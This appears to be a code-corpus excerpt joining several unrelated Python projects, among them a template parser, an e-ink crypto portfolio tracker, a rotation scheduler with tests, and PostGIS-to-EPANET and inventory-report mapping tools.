and tc[2].kind == TokenKind.string_end:
tag = ValueTag()
tag.value = tc[1].text
return tag
return None
class SetParser(TagParser):
def parse(self, template_parser, tc):
if tc == None or template_parser == None:
return None
if len(tc) == 5 \
and tc[0].text == "set" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[3].text == "=" \
and tc[-1].kind == TokenKind.right_parentheses:
tag = SetTag()
tag.name = tc[2].text
coll = tc[4: -1]
tag.value = template_parser.read(coll)
return tag
# if len(tc) == 2 \
# and tc[0].kind == TokenKind.text_data \
# and tc[1].kind == TokenKind.operator \
# and (tc[1].text == "++" or tc[1].text == "--"):
# tag = SetTag()
# tag.name = tc[0].text
# child = ExpressionTag()
# child.add_child()
# tag.value = template_parser.read(coll)
# return tag
if len(tc) > 2 \
and tc[0].kind == TokenKind.text_data \
and tc[1].text == "=":
tag = SetTag()
tag.name = tc[0].text
coll = tc[2:]
tag.value = template_parser.read(coll)
return tag
return None
class NumberParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 1 \
and tc[0].kind == TokenKind.number:
tag = ValueTag()
if tc[0].text.find('.') == -1:
tag.value = int(tc[0].text)
else:
tag.value = float(tc[0].text)
return tag
return None
class LoadParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].text == "load" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = LoadTag()
tag.path = template_parser.read(tc[2:-1])
return tag
class IncludeParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].text == "include" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = IncludeTag()
tag.path = template_parser.read(tc[2:-1])
return tag
class IfParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 3 \
and tc[0].text == "if":
# n = len(tc)
if tc[1].kind != TokenKind.left_parentheses \
or tc[-1].kind != TokenKind.right_parentheses:
raise Exception("syntax error near :%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
tag = IfTag()
child_tag = ElseifTag()
coll = tc[2: -1]
child_tag.test = template_parser.read(coll)
child_tag.first = coll[0]
tag.add_child(child_tag)
while template_parser.next():
if isinstance(template_parser.tag, EndTag):
tag.add_child(template_parser.tag)
return tag
elif isinstance(template_parser.tag, ElseifTag) or \
isinstance(template_parser.tag, ElseTag):
tag.add_child(template_parser.tag)
else:
tag.children[-1].add_child(template_parser.tag)
raise Exception("if is not properly closed by a end tag:%s line:%d col:%d" %
jntemplate.utils.token_concat(tc) % tc[0].begin_line % tc[0].begin_column)
return None
class FunctionParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].kind == TokenKind.text_data \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = FunctionTag()
tag.name = tc[0].text
pos = 0
start = 2
end = 0
i = 2
max = len(tc)
while i < max:
end = i
if tc[i].kind == TokenKind.comma:
if pos == 0:
coll = tc[start: end]
if len(coll) > 0:
tag.add_child(template_parser.read(coll))
start = i + 1
else:
if tc[i].kind == TokenKind.left_parentheses:
pos += 1
elif tc[i].kind == TokenKind.right_parentheses:
pos == 1
if i == len(tc) - 1:
coll = tc[start: end]
if len(coll) > 0:
tag.add_child(template_parser.read(coll))
i += 1
return tag
return None
class ForeachParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 4 \
and (tc[0].text == "for" or tc[0].text == "foreach") \
and tc[1].kind == TokenKind.left_parentheses \
and tc[2].kind == TokenKind.text_data \
and tc[3].text == "in" \
and tc[-1].kind == TokenKind.right_parentheses:
tag = ForeachTag()
tag.name = tc[2].text
coll = tc[4:-1]
tag.source = template_parser.read(coll)
while template_parser.next():
tag.add_child(template_parser.tag)
if isinstance(template_parser.tag, EndTag):
return tag
raise Exception("foreach is not properly closed by a end tag:%s line:%d col:%d" %
jntemplate.utils.token_concat(tc) % tc[0].begin_line % tc[0].begin_column)
class EndParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and tc[0].text == "end":
return EndTag()
return None
class ElseifParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 3 \
and (tc[0].text == "elseif" or tc[0].text == "elif") \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = ElseifTag()
coll = tc[2:-1]
tag.test = template_parser.read(coll)
return tag
return None
class EleseParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and tc[0].text == "else":
return ElseTag()
return None
class BooleanParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and (tc[0].text == "true" or tc[0].text == "false"):
tag = ValueTag()
if tc[0].text == "true":
tag.value = True
else:
tag.value = False
return tag
return None
class ComplexParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2:
start = 0
end = 0
pos = 0
is_func = False
data = []
queue = []
for i in range(len(tc)):
end = i
if tc[i].kind == TokenKind.left_parentheses:
if pos == 0:
if i > 0 and tc[i - 1].kind == TokenKind.text_data:
is_func = True
pos += 1
elif tc[i].kind == TokenKind.right_parentheses:
if pos > 0:
pos -= 1
else:
raise Exception("syntax error near ):%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
if pos == 0:
if not is_func:
queue.append(tc[start + 1: end])
else:
queue.append(tc[start: end+1])
data.append(None)
start = i + 1
elif pos == 0 and (tc[i].kind == TokenKind.dot or tc[i].kind == TokenKind.operator):
if end > start:
queue.append(tc[start: end])
data.append(None)
start = i + 1
data.append(tc[i])
if i == len(tc) - 1 and end >= start:
if start == 0 and end == i:
raise Exception("Unexpected tag:%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
queue.append(tc[start: end+1])
data.append(None)
start = i + 1
if len(queue) == 1 and queue[0] == tc:
return None
tags = []
i = 0
while i < len(data):
if data[i] == None:
tags.append(template_parser.read(queue[0]))
del queue[0]
elif data[i].kind == TokenKind.dot:
if len(tags) == 0 or i == len(data) - 1 or data[i + 1] != None:
raise Exception("syntax error near :%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
if isinstance(tags[-1], ReferenceTag):
tags[-1].add_child(template_parser.read(queue[0]))
del queue[0]
else:
t = ReferenceTag()
t.add_child(tags[-1])
t.add_child(template_parser.read(queue[0]))
del queue[0]
tags[-1] = t
i += 1
elif data[i].kind == TokenKind.operator:
tags.append(TextTag())
tags[-1].first = data[i]
i += 1
if len(tags) == 1:
return tags[0]
if len(tags) > 1:
t = ExpressionTag()
for i in range(len(tags)):
t.add_child(tags[i])
tags.clear()
return t
i += 1
return None
``` |
{
"source": "jinie/crypto_tracker",
"score": 2
} |
#### File: jinie/crypto_tracker/crypto_tracker.py
```python
import json
import time
from io import BytesIO
from pprint import pprint
import locale
import PIL
import inkyphat
import krakenex
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import requests
from PIL import Image, ImageDraw, ImageFont
from pykrakenapi import KrakenAPI
from collections import defaultdict
import collections
import functools
class memoized(object):
'''Decorator. Caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned
(not reevaluated).
'''
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
if not isinstance(args, collections.Hashable):
# uncacheable. a list, for instance.
# better to not cache than blow up.
return self.func(*args)
if args in self.cache:
return self.cache[args]
else:
value = self.func(*args)
self.cache[args] = value
return value
def __repr__(self):
'''Return the function's docstring.'''
return self.func.__doc__
def __get__(self, obj, objtype):
'''Support instance methods.'''
return functools.partial(self.__call__, obj)
class Config(object):
def __init__(self, filename):
with open(filename, 'rt') as f:
conf = json.loads(f.read())
for k,v in conf.items():
setattr(self, k, v)
def get_currencies(self):
return {
'XRP': XrpHandler(),
'ETH': EthHandler(),
'XBT': XbtHandler(),
'LTC': LtcHandler(),
}
class CurrencyHandler(object):
'''Handler base class for a crypto currency'''
def __init__(self, config):
self.config = config
self._fiat_currency = config.fiat_currency
def update(self, accounts):
raise Exception('Not implemented')
@memoized
def get_logo_image(self,url):
try:
req = requests.get(url)
image = BytesIO(req.content)
img = PIL.Image.open(image)
img = img.convert('P')
img.putpalette((0, 0, 0, 255, 255, 255, 255, 0, 0) + (0, 0, 0)*252)
img.thumbnail((70, 104))
return img
except:
return None
def logo(self):
return None
def fiat_currency(self):
return self._fiat_currency
class LtcHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for act in accounts:
url = 'https://api.blockcypher.com/v1/ltc/main/addrs/{}'.format(
act)
req = requests.get(url)
balance = json.loads(req.text)
if 'final_balance' in balance:
total += balance['final_balance']
return total / 100000000
def logo(self):
return self.get_logo_image('http://ltc.133.io/images/logosizes/ltc800.png')
class XbtHandler(CurrencyHandler):
def update(self, accounts):
url = 'https://www.blockonomics.co/api/balance'
addrs = ""
for a in accounts:
addrs += a + " "
body = json.dumps({'addr': addrs})
req = requests.post(url, data=body)
balances = json.loads(req.text)
total = 0
if 'response' not in balances:
pprint(balances)
return 0
for act in balances['response']:
total += act['confirmed']
return total/100000000
def logo(self):
return self.get_logo_image('https://bitcoin.org/img/icons/opengraph.png')
class XrpHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for account in accounts:
url = "https://data.ripple.com/v2/accounts/{}/balances".format(
account)
req = requests.get(url)
balances = json.loads(req.text)
for b in balances['balances']:
if b['currency'] == 'XRP':
total += float(b['value'])
return total
def logo(self):
return self.get_logo_image('https://www.shareicon.net/data/512x512/2016/07/08/117527_ripple_512x512.png')
class EthHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for act in accounts:
url = 'https://api.ethplorer.io/getAddressInfo/{}?apiKey=freekey'.format(
act)
req = requests.get(url)
balances = json.loads(req.text)
total += balances['ETH']['balance']
return total
def logo(self):
return self.get_logo_image('https://www.ethereum.org/images/logos/ETHEREUM-ICON_Black_small.png')
class CryptoTracker(object):
def __init__(self,config):
api = krakenex.API()
self.k = KrakenAPI(api)
self.config = config
def get_exchange_rate(self, crypto, fiat):
pair = "X{}Z{}".format(crypto, fiat)
ticker = self.k.get_ticker_information(pair)
return ticker
def get_currencies(self):
return {
'XRP': XrpHandler(self.config),
'ETH': EthHandler(self.config),
'XBT': XbtHandler(self.config),
'LTC': LtcHandler(self.config),
}
def get_local_currency(self):
return self.config.local_currency
def get_fiat_currency(self):
return self.config.fiat_currency
def get_exchange_rates(self, base=None):
url = 'https://api.fixer.io/latest'
if base is not None:
url += '?base={}'.format(base)
req = requests.get(url)
rates = json.loads(req.text)
return rates['rates']
def update_currencies(self):
accounts = self.config.accounts
balances = defaultdict(float)
rates = defaultdict(float)
crypto_currencies = self.get_currencies()
for curr in accounts.keys():
ohlc = self.get_exchange_rate(curr, crypto_currencies[curr].fiat_currency())
if ohlc is not None and len(ohlc) > 0:
rates[curr] = float(ohlc.iloc[0]['c'][0])
balances[curr] += crypto_currencies[curr].update(accounts[curr])
positions = {curr: balances[curr] * rates[curr] for curr in balances if curr in rates and curr in balances}
return balances, positions
class DisplayHandler(object):
def __init__(self, config, cryptotracker):
locale.setlocale(locale.LC_ALL, '')
self.cryptotracker = cryptotracker
self.config = config
def cga_quantize(self, image):
pal_image = Image.new("P", (1, 1))
pal_image.putpalette(
(0, 0, 0, 255, 0, 0, 255, 255, 255) + (0, 0, 0)*252)
return image.convert("RGB").quantize(palette=pal_image)
def ax_to_image(self, ax):
buf = BytesIO()
fig = ax.get_figure()
fig.savefig(buf, format='png', dpi=fig.dpi, bbox_inches='tight')
im = Image.new('RGB', (inkyphat.WIDTH, inkyphat.HEIGHT),
(255, 255, 255))
pi = Image.open(buf)
pi.thumbnail((inkyphat.WIDTH, inkyphat.HEIGHT))
w, h = pi.size
xo = (inkyphat.WIDTH - w)//2
yo = (inkyphat.HEIGHT - h)//2
im.paste(pi, (xo, yo), pi)
return self.cga_quantize(im)
def get_position_image(self, positions):
v = pd.Series(positions)
plot = v.plot(kind='bar', figsize=(2.3, 1), fontsize=13, color=['r', ])
plot.set_facecolor('w')
x_axis = plot.axes.get_yaxis()
x_axis.set_visible(False)
return self.ax_to_image(plot)
def create_image(self, logo, lines):
im = Image.new("P", (inkyphat.WIDTH, inkyphat.HEIGHT), 255)
im.putpalette(((0, 0, 0, 255, 0, 0, 255, 255, 255) + (0, 0, 0)*252))
draw = ImageDraw.Draw(im)
draw.rectangle((0, 0, inkyphat.WIDTH, inkyphat.HEIGHT),
fill='white', outline='white')
x_offset = 0
if logo is not None:
logo = self.cga_quantize(logo)
w, h = logo.size
ypos = (inkyphat.HEIGHT - h)//2
im.paste(logo, (0, ypos))
x_offset = 71
max_fontsize = (inkyphat.HEIGHT-len(lines)) // len(lines)
y_offset = (inkyphat.HEIGHT - (max_fontsize * len(lines))) // 2
for text in lines:
fontsize = max_fontsize
fits = False
while not fits and fontsize > 5:
font = ImageFont.truetype(inkyphat.fonts.FredokaOne, fontsize)
w, h = font.getsize(text)
if w < inkyphat.WIDTH - x_offset:
fits = True
else:
fontsize -= 1
draw.text((x_offset, y_offset), text, (255, 0, 0), font=font)
y_offset += fontsize + 1
return im
def get_24hour_value(self, current_value, balances):
since = time.time() - 60*60*24
old_value = 0
crypto_currencies = self.cryptotracker.get_currencies()
for curr in balances.keys():
ch = crypto_currencies[curr]
if balances[curr] <= 0:
continue
oh = self.cryptotracker.k.get_ohlc_data('X{}Z{}'.format(curr, ch.fiat_currency()), interval=5, since=since, ascending=True)
old_value += balances[curr] * oh[0]['close'][-1]
change = current_value - old_value
return (100/old_value)*change
def standing_images(self):
balances, values = self.cryptotracker.update_currencies()
rates = self.cryptotracker.get_exchange_rates()
crypto_currencies = self.cryptotracker.get_currencies()
local_currency = self.cryptotracker.get_local_currency()
local_total = round(sum(values.values()), 2) * \
rates[self.cryptotracker.get_local_currency()]
yield self.get_position_image(values)
yield self.create_image(None, lines=['Total Holdings', locale.currency(local_total, grouping=True, symbol=True, international=True),'24 Hour change', '{} %'.format(round(self.get_24hour_value(sum(values.values()), balances)), 2)])
for curr in balances.keys():
total = round(values[curr]*rates[local_currency], 2)
yield self.create_image(crypto_currencies[curr].logo(), (curr, str(balances[curr]), locale.currency(total, symbol=True, grouping=True, international=True)))
def show_slideshow(self, delay=30):
for image in self.standing_images():
inkyphat.set_image(image)
inkyphat.show()
time.sleep(delay)
def main():
config = Config('config.json')
tracker = CryptoTracker(config)
display = DisplayHandler(config, tracker)
while True:
display.show_slideshow()
if __name__ == '__main__':
main()
``` |
{
"source": "jinified/kronos",
"score": 3
} |
#### File: kronos/kronos/kronos.py
```python
from operator import itemgetter
from datetime import datetime, timedelta
def getRotationCapacity(rotationId, startDate, endDate, assignments):
""" Calculate number of users assigned to a particular rotation during the specified duration
"""
start = datetime.strptime(startDate, "%d%m%Y")
end = datetime.strptime(endDate, "%d%m%Y")
duration = int((end - start).days / 7.0)
# Weeks involved during the rotation
weeks = [(start + timedelta(weeks=x)).strftime("%W%Y") for x in range(0, duration)]
capacity = sum(itemgetter(*weeks)(assignments[rotationId][0][0]))
return capacity
def score_assignment(
assignments,
solution,
earliestAvailableDate,
core_rotations=["PMO", "PE", "SE", "PM"],
rotation_duration={
"PMO": 12,
"PE": 12,
"SE": 12,
"PM": 12,
"SYS": 12,
"ARC": 12,
"ANA": 12,
},
):
""" Calculate loss function for suggested solution (negative = better)
Parameters:
assignments (dict): global assignment object by rotation
solution (dict): rotation assignment for a user
earliestAvailableDate (date): earliest date where a user can be assigned a rotation
core_rotations (list): rotation that should be completed first
rotation_duration (dict): duration of each rotation
"""
print(solution)
# SOFT CONSTRAINT 1 - Core rotations should be completed in the first 4 rotations if possible
core_first_loss = sum(
[
-3 if x[0] in core_rotations else 0
for x in solution
if int(x[1]) <= len(core_rotations)
]
)
# SOFT CONSTRAINT 2 - External Assignment must be assigned last
external_assignment_loss = (
99 if "EXT" in [x[0] for x in solution] and solution[-1][0] != "EXT" else 0
)
# Calculate timing of each rotation from solution
solution = [
(
x[0],
rotation_duration[x[0]]
+ (sum([rotation_duration[x[0]] for x in solution[:i]]) if i != 0 else 0),
)
for i, x in enumerate(solution)
]
startDate = earliestAvailableDate
schedule = []
for x in solution:
endDate = startDate + timedelta(weeks=x[1]) - timedelta(days=1)
# Make sure the date falls on weekday
if endDate.weekday() >= 5:
endDate -= timedelta(endDate.weekday() - 4)
schedule.append(
(x[0], startDate.strftime("%d%m%Y"), endDate.strftime("%d%m%Y"))
)
startDate += timedelta(weeks=x[1])
spread_first_loss = sum(
[getRotationCapacity(x[0], x[1], x[2], assignments) for x in schedule]
)
loss = core_first_loss + external_assignment_loss + spread_first_loss
return loss
def schedule2assignments(schedule):
""" Convert schedule object to assignment object
"""
rotations = {}
for userId, userSchedule in schedule.items():
for rotation in userSchedule:
id = rotation["rotationId"]
if id not in rotations:
rotations[id] = [[{}], []]
print(rotations[id][0][0])
startDate, endDate = itemgetter("startDate", "endDate")(rotation)
start = datetime.strptime(startDate, "%d%m%Y")
end = datetime.strptime(endDate, "%d%m%Y")
duration = int((end - start).days / 7.0)
for i in range(duration):
date = (start + timedelta(weeks=i)).strftime("%W%Y")
if date not in rotations[id][0][0]:
rotations[id][0][0][date] = 0
rotations[id][0][0][date] += 1
rotations[id][1].append((userId, startDate, endDate))
sortedDate = sorted(list(rotations[id][0][0].keys()))
if len(rotations[id][0]) < 2:
rotations[id][0].append(sortedDate[0])
rotations[id][0].append(sortedDate[-1])
elif sortedDate[0] < rotations[id][0][1]:
rotations[id][0][1] = sortedDate[0]
elif len(rotations[id][0]) > 2 and sortedDate[-1] > rotations[id][0][2]:
rotations[id][0][2] = sortedDate[-1]
print(rotations)
return rotations
def assignments2schedule(assignments):
""" Convert assignment object to overall schedule
"""
users = {}
for rotationId, rotationInfo in assignments.items():
for userId, userAssignment in rotationInfo[1].items():
if userId not in users:
users[userId] = []
users[userId].append(
{
"rotationId": rotationId,
"startDate": userAssignment[0],
"endDate": userAssignment[1],
}
)
print(users)
return users
def generateUserSchedule(user, assignments, scoring_function):
""" Generate most optimal user schedule
Parameters:
user (object): User
assignments (dict): Time-bounded assignments
scoring_function (function): scoring function to rank possible assignments
Returns:
schedule (list): list of rotations
"""
return [{"rotationId": "PMO", "startDate": "012018"}]
def getOverallSchedule(users):
""" Generate overall schedule from individual user's schedule
Parameters:
users (list): list of Users
Returns:
schedule (dict): overall assignments
"""
return {}
def getConflictingAssignments(schedule):
""" Get list of assignments which exceeded rotation capacity
Parameters:
schedule (dict): overall assignments
Returns:
confictingAssignmentsByRotation (dict): overall schedule with conflicting assignments
"""
return {}
if __name__ == "__main__":
pass
```
#### File: kronos/tests/test_User.py
```python
import pytest
from kronos.User import User
from kronos.kronos import score_assignment
from datetime import datetime, timedelta
@pytest.fixture(scope='function')
def assignments(request):
""" Generate global assignment object
Parameters:
duration (tuple): pair of date string that denote duration that will be covered by the assignments
Returns:
assignment (obj): assignment object
"""
start, end, rotations = request.param
start = datetime.strptime('1' + start, "%w%W%Y")
end = datetime.strptime('1' + end, "%w%W%Y")
duration = int((end - start).days / 7.0)
# Number of assignments per unit time
occupancy = ({(start + timedelta(weeks=x)).strftime('%W%Y'): 0 for x in range(0, duration + 1)}, start.strftime('%W%Y'), end.strftime('%W%Y'))
return {rotationId: (occupancy, assignments) for rotationId, assignments in rotations.items()}
def test_strRepShouldMatchUserObject():
userSchedule = []
possibleRotations = ['PE', 'SE', 'PM', 'ARC', 'ANA', 'SYS'],
joinDate = "01012018"
displayJoinDate = "01 January 2018"
assert str(User("Jason", userSchedule, possibleRotations, joinDate)) == f"Name: Jason Join: {displayJoinDate}\nSchedule: {userSchedule}\nPossible Rotations: {possibleRotations}"
@pytest.mark.parametrize('assignments', [
('012018', '522023', {
'PMO': {
'sjtsoonj': ('01012018', '01042018'),
'thava': ('01032018', '01062018')
},
'PE': {
'soomay': ('01012018', '01042018'),
'brina': ('01032018', '01062018')
},
'PM': {
'chris': ('01012018', '01042018'),
'akmal': ('05072018', '05092018')
},
'SYS': {
'chris': ('01012019', '01042019'),
'akmal': ('05092018', '05112018')
},
'ARC': {
'jiawei': ('01012019', '01042019'),
'tauteng': ('05092018', '05112018')
},
'ANA': {
'jin': ('01012019', '01042019'),
'thava': ('05092018', '05112018')
},
'SE': {
}})
], indirect=['assignments'])
def test_generateSchedule(assignments):
userSchedule = []
possibleRotations = ['PE', 'SE', 'PM', 'ARC', 'ANA', 'SYS']
joinDate = "01012018"
user = User("Jason", userSchedule, possibleRotations, joinDate)
assert len(user.generateSchedule(assignments, score_assignment)) == len(possibleRotations)
``` |
{
"source": "JinIgarashi/postgis2epanet",
"score": 3
} |
#### File: postgis2epanet/epanet/coordinates.py
```python
import shapefile
from epanet.layer_base import LayerBase
class Coordinates(LayerBase):
class Coordinate(object):
def __init__(self, id, lon, lat, altitude, lon_utm, lat_utm):
self.id = id
self.lon = round(lon, 6)
self.lat = round(lat, 6)
self.altitude = altitude or 0
self.lon_utm = round(lon_utm, 3)
self.lat_utm = round(lat_utm, 3)
self.demand = 0.0
self.pattern = ""
@staticmethod
def create_header_junction(f):
f.writelines("[JUNCTIONS]\n")
f.writelines(";{0}\t{1}\t{2}\t{3}\n"
.format("ID\t".expandtabs(20),
"Elev\t".expandtabs(12),
"Demand\t".expandtabs(12),
"Pattern\t".expandtabs(16)))
def add_junction(self, f):
f.writelines(" {0}\t{1}\t{2}\t{3}\t;\n"
.format("{0}\t".format(self.id).expandtabs(20),
"{0}\t".format(self.altitude).expandtabs(12),
"{0}\t".format(self.demand).expandtabs(12),
"{0}\t".format(self.pattern).expandtabs(16)))
@staticmethod
def create_header_coordinates(f):
f.writelines("[COORDINATES]\n")
f.writelines(";{0}\t{1}\t{2}\n"
.format("Node\t".expandtabs(20),
"X-Coord\t".expandtabs(16),
"Y-Coord\t".expandtabs(16)))
def add_coordinate(self, f):
f.writelines(" {0}\t{1}\t{2}\n"
.format("{0}\t".format(self.id).expandtabs(20),
"{0}\t".format(self.lon_utm).expandtabs(16),
"{0}\t".format(self.lat_utm).expandtabs(16)))
def __init__(self, wss_id):
super().__init__("junctions", wss_id)
self.coordMap = {}
def get_coord_by_id(self, id):
for key in self.coordMap:
coord = self.coordMap[key]
if id == coord.id:
return coord
def get_data(self, db):
query = " WITH points2d AS "
query += " (SELECT (ST_DumpPoints(geom)).geom AS geom FROM pipeline where wss_id={0}), ".format(self.wss_id)
query += " cells AS "
query += " (SELECT p.geom AS geom, ST_Value(a.rast, 1, p.geom) AS alt, "
query += " ST_X(geom) as lon, ST_Y(geom) as lat "
query += " FROM rwanda_dem_10m a RIGHT JOIN points2d p "
query += " ON ST_Intersects(a.rast, p.geom)), "
query += " points3d AS "
query += " (SELECT "
query += " ST_SetSRID(COALESCE(" \
"ST_MakePoint(lon, lat, alt), " \
"ST_MakePoint(lon, lat)), {0}) AS geom ".format(str(self.epsg))
query += " , lon, lat, alt "
query += " FROM cells) "
query += " SELECT row_number() over() as id,st_x(geom) as lon, st_y(geom) as lat, st_z(geom)as alt, "
query += " st_x(st_transform(geom,{0})) as lon_utm, st_y(st_transform(geom,{0})) as lat_utm ".format(str(self.epsg_utm))
query += " FROM points3d WHERE geom is not NULL"
result = db.execute(query)
for data in result:
coord = Coordinates.Coordinate("Node-" + str(data[0]), data[1], data[2], data[3], data[4], data[5])
key = ",".join([str(coord.lon), str(coord.lat)])
self.coordMap[key] = coord
def add_coordinate(self, coord):
target_key = ",".join([str(coord.lon), str(coord.lat)])
del_key = []
for key in self.coordMap:
if key == target_key:
del_key.append(target_key)
for key in del_key:
self.coordMap.pop(key)
self.coordMap[target_key] = coord
def export_junctions(self, f):
Coordinates.Coordinate.create_header_junction(f)
for key in self.coordMap:
coord = self.coordMap[key]
if "Node" in coord.id:
coord.add_junction(f)
f.writelines("\n")
def export_coordinates(self, f):
Coordinates.Coordinate.create_header_coordinates(f)
for key in self.coordMap:
coord = self.coordMap[key]
coord.add_coordinate(f)
f.writelines("\n")
def export_shapefile(self, f, del_coords_id):
filename = self.get_file_path(f)
with shapefile.Writer(filename) as _shp:
_shp.autoBalance = 1
_shp.field('dc_id', 'C', 254)
_shp.field('elevation', 'N', 20)
_shp.field('pattern', 'C', 254)
_shp.field('demand', 'N', 20, 9)
_shp.field('demand_pto', 'N', 20, 9)
for key in self.coordMap:
coord = self.coordMap[key]
if "Node" in coord.id:
if coord.id in del_coords_id:
continue
_shp.point(float(coord.lon), float(coord.lat))
_shp.record(coord.id, coord.altitude, coord.pattern, coord.demand, '')
_shp.close()
self.createProjection(filename)
def add_demands(self, connections):
for conn in connections:
target_key = ",".join([str(conn.lon), str(conn.lat)])
for key in self.coordMap:
if key == target_key:
self.coordMap[key].demand = conn.demands
``` |
{
"source": "JinIgarashi/postgis2inventoryreport",
"score": 3
} |
#### File: lib/layer/pipeline.py
```python
from lib.layer.layerbase import LayerBase
class Pipeline(LayerBase):
def __init__(self, conn):
super().__init__(conn, 'pipeline')
def plot(self, ax):
if self.df.empty:
return
self.df.plot(ax=ax, figsize=(20, 10), color='blue', linewidth=1, label="Pipeline")
```
#### File: lib/layer/waterconnection.py
```python
from lib.layer.layerbase import LayerBase
class WaterConnection(LayerBase):
def __init__(self, conn):
super().__init__(conn, 'water_connection')
def plot(self, ax):
cmap = self.generate_cmap(['green', 'yellow', 'red'])
typelist = [{'name' : 'Household', 'marker': 'p', 'column': 'status', 'markersize': 45},
{'name' : 'Public Tap', 'marker': '$\\bigoplus$', 'column': 'status', 'markersize': 30},
{'name' : 'Water Kiosk', 'marker': '$\\bigodot$', 'column': 'status', 'markersize': 30},
{'name': 'Industrial', 'marker': '$\\bigotimes$', 'column': 'status', 'markersize': 30}]
self.plot_by_filter(ax, 'connection_type', typelist, cmap)
```
#### File: postgis2inventoryreport/lib/mapcreator.py
```python
import os
from lib.map.districtmap import DistrictMap
from lib.map.wssmap import WssMap
class MapCreator(object):
def __init__(self, db, district, main_directory):
self.db = db
self.district = district
self.main_directory = main_directory
def create(self):
if not os.path.exists(self.main_directory):
os.makedirs(self.main_directory, exist_ok=True)
dist_dir = "/".join([self.main_directory, "images", str(self.district.dist_id)])
dist_map = DistrictMap(self.db, dist_dir, self.district.dist_id, self.district.wss_id_list)
dist_map.create()
for wss_id in self.district.wss_id_list.split(','):
wss = WssMap(self.db, dist_dir, wss_id)
wss.create()
``` |
{
"source": "JinIgarashi/postgis2qfield",
"score": 2
} |
#### File: postgis2qfield/layers/junction.py
```python
from layers.layer_base import LayerBase
class Junction(LayerBase):
def __init__(self):
super().__init__("junction")
self.parse_dates = ['input_date']
``` |
{
"source": "jinimong/serverless-study",
"score": 2
} |
#### File: serverless/make/lambda_function.py
```python
import os
import json
import boto3
import qrcode
from PIL import Image, ImageDraw, ImageFont
def lambda_handler(event, context):
# S3에서 필요한 파일 불러오기
s3 = boto3.resource("s3")
s3.Object(os.environ["BUCKET_NAME"], "imgs/cat.jpg").download_file(
"/tmp/logo.jpg"
)
s3.Object(
os.environ["BUCKET_NAME"], "fonts/summer-calling.ttf"
).download_file("/tmp/font.ttf")
records = event["Records"]
if records:
user_id = records[0]["Sns"]["Message"]
conf_type = records[0]["Sns"]["Subject"]
# dynamodb 에서 데이터 불러오기
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table(os.environ["TABLE_NAME"])
row = table.get_item(Key={"user_id": user_id, "type": conf_type})
item = row["Item"]
save_path = "/tmp/image.jpg"
key = f"qrcodes/{user_id}/{conf_type}/qrcode.jpg"
# 이미지 생성 후 S3 업로드
make_image(data=item, save_path=save_path)
s3.meta.client.upload_file(
save_path,
os.environ["BUCKET_NAME"],
key,
ExtraArgs={"ContentType": "image/jpeg"},
)
return {"statusCode": 200, "event": event}
def make_image(data, save_path):
W, H = (400, 400)
# logo img
logo = Image.open("/tmp/logo.jpg").convert("RGBA")
ttf = "/tmp/font.ttf"
# qrcode img
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=4,
border=4,
)
qr.add_data(data.get("phone_number", ""))
qr.make(fit=True)
qr_img = qr.make_image(fill_color="black", back_color="white")
# merge
img = Image.new("RGB", (W, H), color="#fff")
img.paste(logo, (0, 0), logo)
img.paste(qr_img, (270, 50))
# draw
font_m = ImageFont.truetype(ttf, 15)
font_b = ImageFont.truetype(ttf, 18)
font_B = ImageFont.truetype(ttf, 19)
draw = ImageDraw.Draw(img)
draw.text((50, 240), data.get("user_name", ""), fill="#000", font=font_b)
company_name = data.get("company_name", "")
draw.text((50, 280), f"From {company_name}", fill="#000", font=font_m)
draw.text((20, 200), "FULL CONFERENCE PASS", fill="#ed244b", font=font_B)
img.save(save_path, quality=100)
``` |
{
"source": "jinimp/QAS",
"score": 2
} |
#### File: QAS/Image/models.py
```python
from django.db import models
class Image(models.Model):
"""大图信息"""
id = models.AutoField(primary_key=True, verbose_name=u'唯一主键')
file_name = models.CharField(max_length=128, verbose_name=u'文件名', null=True, blank=True)
suffix = models.CharField(max_length=16, verbose_name=u'文件后缀名', null=True, blank=True)
storage_path = models.CharField(max_length=256, verbose_name=u'存储路径', null=True, blank=True)
last_open_time = models.DateTimeField(verbose_name=u'上次打开时间', null=True, blank=True)
file_size = models.CharField(max_length=16, verbose_name=u'文件大小', null=True, blank=True)
is_delete = models.BooleanField(verbose_name=u'是否逻辑删除', default=False)
